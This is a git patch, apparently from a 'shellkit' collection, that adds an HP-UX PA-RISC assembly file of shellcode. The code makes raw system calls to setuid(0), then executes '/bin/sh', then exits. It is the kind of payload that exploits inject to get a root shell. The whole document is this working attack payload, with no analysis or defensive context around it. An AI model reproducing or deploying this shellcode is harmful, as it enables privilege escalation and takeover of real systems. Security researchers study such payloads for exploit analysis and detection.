From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/shellkit/tmp/hpux-tools/shell-two.s | 41 +++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 other/shellkit/tmp/hpux-tools/shell-two.s

(limited to 'other/shellkit/tmp/hpux-tools/shell-two.s')

diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        xor     %r26, %r26, %r26; 0 - argv0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    523, %r22, %r22 ; setuid(0)
+jump
+        bl      .+4,%r1      ; address into %r1
+        addi    500, %r1, %r3;
+        stb     %r0, SHELL-jump+7-11-500(%sr0,%r3)
+
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-jump-11-500, %r26;
+        add     %r3, %r26, %r26;
+
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    511, %r22, %r22 ;
+
+        xor     %r26, %r26, %r26; return 0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    501, %r22, %r22 ; exit 
+
+SHELL
+                .STRING "/bin/shA";
+
+endofshellcode
-- 
cgit v1.3